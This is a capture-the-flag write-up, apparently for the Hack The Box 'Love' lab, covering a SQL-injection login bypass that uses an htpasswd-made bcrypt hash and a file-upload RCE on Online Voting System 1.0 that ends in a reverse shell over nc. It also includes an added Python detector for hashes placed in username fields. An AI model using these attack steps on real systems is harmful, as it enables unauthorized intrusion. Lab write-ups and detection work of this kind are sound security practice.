Authentication Bypass + File Upload RCE


The target web server appears to be hosting a published web application that is known to be vulnerable. Although the version information has not been confirmed, I will attempt to run the following exploits to gain a foothold:

  • [[Love_CVE-2018-6180#[CVE-2018-6180](https://nvd.nist.gov/vuln/detail/CVE-2018-6180)|CVE-2018-6180]]
  • [[Love_File_Upload_RCE#[Online Voting System 1.0 Remote Code Execution](https://packetstormsecurity.com/files/163333/Online-Voting-System-1.0-Remote-Code-Execution.html)|File_Upload_RCE]]

[[Love_CVE-2018-6180#[CVE-2018-6180](https://nvd.nist.gov/vuln/detail/CVE-2018-6180)|Authentication Bypass]]


Authentication bypass is done through SQL injection.

As the exploit suggests, an arbitrary bcrypt hash is required for the injection.

┌──(kali㉿kali)-[~/archive/htb/labs/love]
└─$ htpasswd -nbBC 10 admin admin 
admin:$2y$10$cZIw0ImFo3M78UyP3m/dae1t8eUrfzxjo8fqG8KjpE.JlJkSXG2LK

A bcrypt hash can easily be generated using the htpasswd tool.

I will then append the hash string to the username parameter along with the rest of the SQL injection payload.

Authenticated to the admin panel.
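From the defender's side, the distinctive fingerprint of this bypass is a bcrypt-formatted hash string arriving in the username field of a login request. The following detector is an added example written for this page, not part of the original writeup or the exploit; it assumes a hypothetical "client METHOD path body" application log format, a login parameter named username, and uses the htpasswd-generated hash shown above as constructed sample data.

```python
import re
from urllib.parse import parse_qs

# A bcrypt hash string: $2a/$2b/$2y prefix, two-digit cost, then 53 chars of
# salt + digest. One of these has no business appearing in a username field.
BCRYPT_RE = re.compile(r"\$2[aby]\$\d{2}\$[./A-Za-z0-9]{53}")
# Weak secondary signal: SQL metacharacters/keywords in the username field.
SQLI_RE = re.compile(r"('|--|/\*|\bunion\b|\bselect\b|\bor\b\s+\d+=\d+)", re.I)

# Constructed sample log (hypothetical "client METHOD path urlencoded-body"
# format). The hash is the one generated with htpasswd on this page; the
# surrounding username values are made up and are not a working payload.
SAMPLE_LOG = """\
10.0.0.5 POST /admin/login.php username=alice&password=Winter2021
10.0.0.7 POST /admin/login.php username=o%27brien&password=hunter2
10.0.0.9 POST /admin/login.php username=admin%27+%242y%2410%24cZIw0ImFo3M78UyP3m%2Fdae1t8eUrfzxjo8fqG8KjpE.JlJkSXG2LK&password=admin
"""


def analyse_login_request(body: str) -> dict:
    """Decode one URL-encoded login body and report the signals found."""
    params = parse_qs(body, keep_blank_values=True)
    username = params.get("username", [""])[0]
    return {
        "username": username,
        "bcrypt_in_username": bool(BCRYPT_RE.search(username)),
        "sqli_chars_in_username": bool(SQLI_RE.search(username)),
    }


def severity(signals: dict) -> str:
    """Rank a request: a hash in the username is a strong signal on its own;
    a lone apostrophe is common in real names (O'Brien) and only merits review."""
    if signals["bcrypt_in_username"]:
        return "high"
    if signals["sqli_chars_in_username"]:
        return "low"
    return "none"


def scan_log(log_text: str) -> list:
    """Return (client, severity, decoded username) for each login POST."""
    findings = []
    for line in log_text.splitlines():
        client, method, path, body = line.split(" ", 3)
        if method != "POST" or not path.endswith("login.php"):
            continue
        sig = analyse_login_request(body)
        findings.append((client, severity(sig), sig["username"]))
    return findings
```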

[[Love_File_Upload_RCE#[Online Voting System 1.0 Remote Code Execution](https://packetstormsecurity.com/files/163333/Online-Voting-System-1.0-Remote-Code-Execution.html)|File Upload RCE]]


The Python script requires some configuration, including the credentials of the admin user.

Since it was set to admin in the earlier SQL injection, I will set it to admin.

┌──(kali㉿kali)-[~/archive/htb/labs/love]
└─$ python3 voting-system-file-upload-RCE.py            
Start a NC listner on the port you choose above and run...
Logged in
Poc sent successfully

Executing the script gives a callback on the listener.

┌──(kali㉿kali)-[~/archive/htb/labs/love]
└─$ nnc 9999                                       
listening on [any] 9999 ...
connect to [10.10.14.17] from (UNKNOWN) [10.10.10.239] 55456
b374k shell : connected
 
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.
 
c:\xampp\htdocs\omrs\images> whoami
 whoami
love\phoebe
 
c:\xampp\htdocs\omrs\images> hostname
 hostname
Love
 
c:\xampp\htdocs\omrs\images> ipconfig
 ipconfig
 
Windows IP Configuration
 
 
ethernet adapter ethernet0 2:
 
   connection-specific dns suffix  . : 
   ipv4 address. . . . . . . . . . . : 10.10.10.239
   subnet mask . . . . . . . . . . . : 255.255.255.0
   default gateway . . . . . . . . . : 10.10.10.2

Initial foothold established on the target system as the phoebe user via Authentication Bypass + File Upload RCE.